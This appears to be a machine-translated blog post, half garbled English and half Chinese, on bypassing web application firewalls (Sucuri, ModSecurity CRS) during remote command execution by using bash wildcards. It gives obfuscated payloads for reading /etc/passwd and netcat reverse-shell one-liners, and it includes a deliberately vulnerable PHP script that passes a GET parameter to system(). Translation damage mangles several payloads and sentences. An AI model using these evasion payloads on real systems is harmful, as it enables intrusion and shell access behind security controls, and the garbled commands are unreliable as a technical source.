Found in remote command execution vulnerability in Web applications is not uncommon, "OWASP Top 10 2017" list, the "injection" in the first place, can be seen:
When the attacker sends a command or query untrusted data to the interpreter, it will produce injection vulnerabilities, such as SQL, NoSQL, OS, and LDAP injection. Data attacker could entice interpreter to execute commands or accidental access data without authorization.
All modern Web application firewall can intercept RCE try, but when it happens in a Linux system, we have a way to circumvent the WAF rule set.
Penetration testing, the characters are very useful "wild card." Before you start doing WAPT, I want to tell you something you may not know bash and wildcard usage.
Special wildcard usage
Bash standard wildcard characters (also referred to as a wildcard pattern) by a variety of command-line utility for processing a plurality of files. Not everyone knows bash syntax can use the question mark?, Forward slash /, numbers, and letters to execute system commands. You can even enumerate files and use the same number of characters access to its content. A few chestnuts: You can use the following syntax to replace the ls command:
/ ??? / S?
Use this syntax, you can basically do anything you want. Suppose vulnerable target located behind the WAF, WAF and this has a rule that prevents comprise / etc / passwd or / bin / ls GET parameter values in all of the body or POST requests.
If you try to issue such a request, /? Cmd = cat + / etc / passwd will be blocked target WAF, your IP will be permanently disabled and labeled as yet another f *** in 'redteamer. But you have this secret weapon wildcards.
? If the target WAF does not prevent the query string, and /, you can easily make your request (url encoded) come to this: / cmd =% 2f ???% 2f ?? t% 20% 2f? ???% 2fp ?? s ??
shown in the figure, there are three errors: / bin / cat *: Is a directory. This happens because the / ??? /? T can be interpreted as a global process / bin / cat, can also be interpreted as / dev / net or / etc / apt and so on.
Question mark wildcard can represent any character. So, if you know part of a file name, then you can use this wildcard. For example, ls *. ??? lists the file extension in the current directory of all the length of 3 characters. So, you'll have to see, such as .gif, .jpg, .txt file extension like.
Use the wildcard, you can perform a bounce shell with netcat. Suppose you need to perform a bounce shell on port 1337 of 127.0.0.1 (usually nc -e / bin / bash 127.0.0.1 1337 ), you can use the following syntax to accomplish:
/ ??? / the n--e / ??? ? / b ?? h 2130706433 1337
Translating the IP address 127.0.0.1 long integer format (2,130,706,433), avoid using. Characters in the HTTP request.
In kali it is necessary to use instead nc.traditional NC, no -e parameters to / bin / bash performed after the connection. Payload this becomes:
/???/?c.??? -e /???/b??h 2130706433 1337
Use wildcards to perform rebound shell
In summarize two commands we have just seen:
Default
Standard: / bin / nc 127.0.0.1 1337
to bypass:? / ??? / n 2130706433 1337
using the characters: / n [0-9]?
标准:/bin/cat /etc/passwd
绕过:/???/??t /???/??ss??
使用字符:/ ? t s
为什么使用 ? 而不是 ?由于 * 广泛用于评论语法,许多 WAF 为了避免 SQL 注入而过滤它,像 UNION+SELECT+1,2,3/
使用 echo 来枚举文件和目录。该 echo 命令可以使用通配符枚举文件系统上的文件和目录。例如 echo /*/ss :
这命令可以在 RCE 漏洞中使用,以获取目标系统上的文件和目录,例如:
但为什么使用通配符(特别是问号)可以绕过 WAF?
Sucuri WAF 绕过
测试 WAF 规则集的最佳方法是什么?创建一个有漏洞的 PHP 脚本,并尝试所有可能的技术。在上图的左上方的窗格中,是一个有漏洞的PHP脚本。
Default
<?php
echo 'ok: ';
print_r($_GET['c']);
system($_GET['c']);
在左下方的窗格中,你可以看到对这个网站(test1.unicresit.it)进行远程命令执行测试。正如你所看到的,Sucuri WAF 以 An attempted RFI/LFI was detected and blocked 理由阻止请求。
右窗格显示了同样的请求,但却使用 ? 作为通配符,结果是 Sucuri WAF 没有阻止这个请求,应用程序执行了放入 c 参数的命令。现在就可以读取 /etc/passwd 文件,甚至更多。
我可以读取应用程序本身的 PHP 源代码,可以使用 netcat(/???/?c)执行反弹 shell,或者我可以执行 curl 或 wget 来获取网络服务器的真实 IP,使我能够通过直接连接目标来绕过 WAF。
ModSecurity OWASP CRS 3.0
The following document provides a good overview on each level works REQUEST PROTOCOL ENFORCEMENT rules. PL1 allows query string containing ASCII codes in the range 1-255, from PL1 to PL4, allowing less ASCII code.
Default
# -=[ Targets and ASCII Ranges ]=-
#
# 920270: PL1
# REQUEST_URI, REQUEST_HEADERS, ARGS and ARGS_NAMES
# ASCII: 1-255
# Example: Full ASCII range without null character
#
# 920271: PL2
# REQUEST_URI, REQUEST_HEADERS, ARGS and ARGS_NAMES
# ASCII: 9,10,13,32-126,128-255
# Example: Full visible ASCII range, tab, newline
#
# 920272: PL3
# REQUEST_URI, REQUEST_HEADERS, ARGS, ARGS_NAMES, REQUEST_BODY
# ASCII: 32-36,38-126
# Example: Visible lower ASCII range without percent symbol
#
# 920273: PL4
# ARGS, ARGS_NAMES and REQUEST_BODY
# ASCII: 38,44-46,48-58,61,65-90,95,97-122
# Example: A-Z a-z 0-9 = - _ . , : &
#
# 920274: PL4
# REQUEST_HEADERS without User-Agent, Referer, Cookie
# ASCII: 32,34,38,42-59,61,65-90,95,97-122
# Example: A-Z a-z 0-9 = - _ . , : & " * + / SPACE
Paranoia Level 0 (PL0)
less PL0 open protection rules, our code can be executed properly.